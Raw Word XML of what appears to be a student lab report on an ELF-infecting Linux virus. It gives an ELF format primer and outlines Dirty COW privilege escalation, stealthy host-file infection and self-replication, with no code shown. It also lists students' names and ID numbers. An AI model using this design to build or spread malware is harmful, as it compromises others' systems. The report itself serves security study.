          <w:p w14:paraId="0C16ACAE" w14:textId="340F7E8A" w:rsidR="00EA27AC" w:rsidRPr="008B38C3" w:rsidRDefault="00F169E7" w:rsidP="008B38C3">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F169E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>代码</w:t>
            </w:r>
            <w:r w:rsidRPr="00F169E7">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>DEBUG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>，病毒</w:t>
            </w:r>
            <w:r w:rsidRPr="00F169E7">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>常量测试维护，代码优化</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA27AC" w14:paraId="4A301747" w14:textId="5CEB36D9" w:rsidTr="00F169E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D0961EF" w14:textId="77777777" w:rsidR="00EA27AC" w:rsidRDefault="00EA27AC" w:rsidP="00F266B9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F266B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>章暄</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BFED4A3" w14:textId="3C191C88" w:rsidR="00EA27AC" w:rsidRPr="008B38C3" w:rsidRDefault="00EA27AC" w:rsidP="008B38C3">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B38C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>5140309564</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46A4000B" w14:textId="60780B11" w:rsidR="00EA27AC" w:rsidRPr="008B38C3" w:rsidRDefault="00F169E7" w:rsidP="008B38C3">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F169E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>资料查找，</w:t>
            </w:r>
            <w:r w:rsidRPr="00F169E7">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>ELF文件分析，代码测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA27AC" w14:paraId="214F26C4" w14:textId="1CA27E57" w:rsidTr="00F169E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31F9E320" w14:textId="77777777" w:rsidR="00EA27AC" w:rsidRDefault="00EA27AC" w:rsidP="00F266B9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F266B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>仇知</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A8AFE6B" w14:textId="60C6896A" w:rsidR="00EA27AC" w:rsidRPr="008B38C3" w:rsidRDefault="00EA27AC" w:rsidP="008B38C3">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B38C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>5140309548</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20D58901" w14:textId="0B56AAAD" w:rsidR="00EA27AC" w:rsidRPr="008B38C3" w:rsidRDefault="00F169E7" w:rsidP="008B38C3">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F169E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>漏洞查找，漏洞代码分析测试，作图</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="748EE326" w14:textId="77777777" w:rsidR="00F266B9" w:rsidRDefault="00F266B9" w:rsidP="00F266B9">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="1680"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F266B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00602760" w:rsidRPr="00F266B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD209E" w14:textId="77777777" w:rsidR="00F266B9" w:rsidRDefault="00F266B9" w:rsidP="00F266B9">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="1680"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F266B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00602760" w:rsidRPr="00F266B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C911F6" w14:textId="77777777" w:rsidR="00F266B9" w:rsidRDefault="00F266B9"/>
    <w:p w14:paraId="00C2C591" w14:textId="77777777" w:rsidR="00602760" w:rsidRPr="00F266B9" w:rsidRDefault="00602760">
      <w:pPr>
        <w:rPr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66B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia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病毒原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21EBD2" w14:textId="77777777" w:rsidR="00602760" w:rsidRDefault="00602760"/>
    <w:p w14:paraId="6F60AE34" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRPr="00B81116" w:rsidRDefault="00A373AD" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz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81116">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz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LF文件简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B08012A" w14:textId="77777777" w:rsidR="00B81116" w:rsidRDefault="00B81116"/>
    <w:p w14:paraId="2D21A743" w14:textId="77777777" w:rsidR="009A60EC" w:rsidRPr="002A68F8" w:rsidRDefault="009A60EC" w:rsidP="009A60EC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A68F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在计算机科学中，ELF(Executable and Linkable Format)是一种用于二进制文件、可执行文件、目标代码、共享库和核心转储的标准文件格式。</w:t>
      </w:r>
      <w:r w:rsidRPr="002A68F8">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ELF</w:t>
      </w:r>
      <w:r w:rsidRPr="002A68F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是UNIX系统实验室（USL）作为应用程序二进制接口（Application Binary Interface，ABI）而开发和发布的，也是Linux的主要可执行文件格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A8AAE" w14:textId="77777777" w:rsidR="009A60EC" w:rsidRPr="002A68F8" w:rsidRDefault="009A60EC" w:rsidP="009A60EC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A68F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ELF文件由4部分组成，分别是ELF头（ELF header）、程序头表（Program header table）、节（Section）和节头表（Section header table）。实际上，一个文件中不一定包含全部内容，而且他们的位置也未必如同所示这样安排，只有ELF头的位置是固定的，其余各部分的位置、大小等信息由ELF头中的各项值来决定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38473125" w14:textId="77777777" w:rsidR="009A60EC" w:rsidRPr="002A68F8" w:rsidRDefault="009A60EC" w:rsidP="009A60EC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A68F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一个ELF头在文件的开始，保存了路线图(road map)，描述了该文件的组织情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E351CB4" w14:textId="77777777" w:rsidR="009A60EC" w:rsidRPr="002A68F8" w:rsidRDefault="009A60EC" w:rsidP="009A60EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A68F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>程序头表（program header table）告诉系统如何来创建一个进程的内存映象，在可重定位文件中不需要它。节头表（section header table）包含了描述文件sections的信息，可以让我们定位所有的sections。每个section在这个表中有一个入口；每个入口给出了该section的名字，大小，等等信息。section保存着object 文件的信息，从连接角度看：包括指令，数据，符号表，重定位信息等等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769AEB12" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRPr="009A60EC" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="30390EE5" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="17FD3CB0" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="690DE914" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="55B3867F" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz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81116">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz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病毒工作原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B94FE" w14:textId="77777777" w:rsidR="00B81116" w:rsidRPr="00B81116" w:rsidRDefault="00B81116" w:rsidP="00B81116">
      <w:pPr>
        <w:rPr>
          <w:sz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FCFD2D3" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRPr="00B81116" w:rsidRDefault="00286FCB" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击LINUX漏洞，</w:t>
      </w:r>
      <w:r w:rsidR="0066557D">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限提升</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7E0D6" w14:textId="77777777" w:rsidR="00286FCB" w:rsidRDefault="003E18EF" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此步骤为了使得后续病毒母体写入时拥有足够的权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED95912" w14:textId="77777777" w:rsidR="00B81116" w:rsidRPr="00B81116" w:rsidRDefault="00B81116" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433ACD86" w14:textId="77777777" w:rsidR="00286FCB" w:rsidRPr="00B81116" w:rsidRDefault="00286FCB" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用root权限将病毒母体写入高权限文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB5A2F" w14:textId="77777777" w:rsidR="00286FCB" w:rsidRDefault="003E18EF" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此文件的高权限将保证后续病毒在传播时写入操作拥有足够权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEF8201" w14:textId="77777777" w:rsidR="00B81116" w:rsidRPr="00B81116" w:rsidRDefault="00B81116" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5B64C4" w14:textId="77777777" w:rsidR="00286FCB" w:rsidRPr="00B81116" w:rsidRDefault="00286FCB" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当高权限文件执行时</w:t>
      </w:r>
      <w:r w:rsidR="00207608" w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，病毒文件被激活， 病毒文件首先运行自身，再将操作权交给源文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35652E" w14:textId="77777777" w:rsidR="00207608" w:rsidRDefault="00334E82" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>为了保证病毒的运行稳定性</w:t>
      </w:r>
      <w:r w:rsidR="003B4551" w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>和隐蔽性，原文件要确保能够正常运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37777578" w14:textId="77777777" w:rsidR="00B81116" w:rsidRPr="00B81116" w:rsidRDefault="00B81116" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE25BAD" w14:textId="77777777" w:rsidR="00207608" w:rsidRPr="00B81116" w:rsidRDefault="00207608" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>病毒运行时，第一步执行特定间谍任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3E8F2" w14:textId="77777777" w:rsidR="00207608" w:rsidRDefault="003B4551" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在此病毒文件演示中，被感染文件只会输出特定字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C515F" w14:textId="77777777" w:rsidR="00B81116" w:rsidRPr="00B81116" w:rsidRDefault="00B81116" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727A91F6" w14:textId="77777777" w:rsidR="00207608" w:rsidRPr="00B81116" w:rsidRDefault="00207608" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第二步复制自身</w:t>
      </w:r>
      <w:r w:rsidR="003B4551" w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>感染</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>其他的ELF文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633E6C26" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="003B4551" w:rsidP="00B81116">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B81116">
        <w:rPr>
          <w:rFonts w:ascii="华文细黑" w:eastAsia="华文细黑" w:hAnsi="华文细黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>高效传播，使得病毒本身难以清理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7C94A" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="478213C5" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD">
      <w:pPr>
        <w:rPr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1116">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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实现的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D3804" w14:textId="77777777" w:rsidR="003A089F" w:rsidRDefault="003A089F"/>
    <w:p w14:paraId="1B9AEE49" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRPr="003A089F" w:rsidRDefault="00862BCD" w:rsidP="003A089F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A089F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在运行注入程序后</w:t>
      </w:r>
      <w:r w:rsidR="003A089F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，injector将病毒注入文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003A089F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，如果运行被感染文件，它会输出</w:t>
      </w:r>
      <w:r w:rsidR="00D02FE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一些字符串并感染其他文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B43186" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="18DCB4B4" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="660D1AC1" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="1FC85540" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRPr="00B81116" w:rsidRDefault="00A373AD">
      <w:pPr>
        <w:rPr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1116">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="4472C4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实现分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B4ABF" w14:textId="77777777" w:rsidR="005022D8" w:rsidRDefault="005022D8" w:rsidP="001C7A47"/>
    <w:p w14:paraId="0BEF5AB4" w14:textId="77777777" w:rsidR="001C7A47" w:rsidRDefault="001C7A47" w:rsidP="00382454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00382454">
        <w:rPr>
          <w:rFonts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攻击LINUX漏洞，权限提升</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787772A5" w14:textId="77777777" w:rsidR="001C7A47" w:rsidRPr="002F33C7" w:rsidRDefault="00AC3799" w:rsidP="001C7A47">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在该实验中我们小组利用LINUX系统的漏洞</w:t>
      </w:r>
      <w:r w:rsidR="005022D8" w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dirty</w:t>
      </w:r>
      <w:r w:rsidR="005022D8" w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t xml:space="preserve"> cow</w:t>
      </w:r>
      <w:r w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19761A2E" w14:textId="77777777" w:rsidR="00AC3799" w:rsidRPr="002F33C7" w:rsidRDefault="00AC3799" w:rsidP="001C7A47">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D72276" w14:textId="77777777" w:rsidR="00AC3799" w:rsidRPr="002F33C7" w:rsidRDefault="00B851F5" w:rsidP="002F33C7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1978">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
      <w:r w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
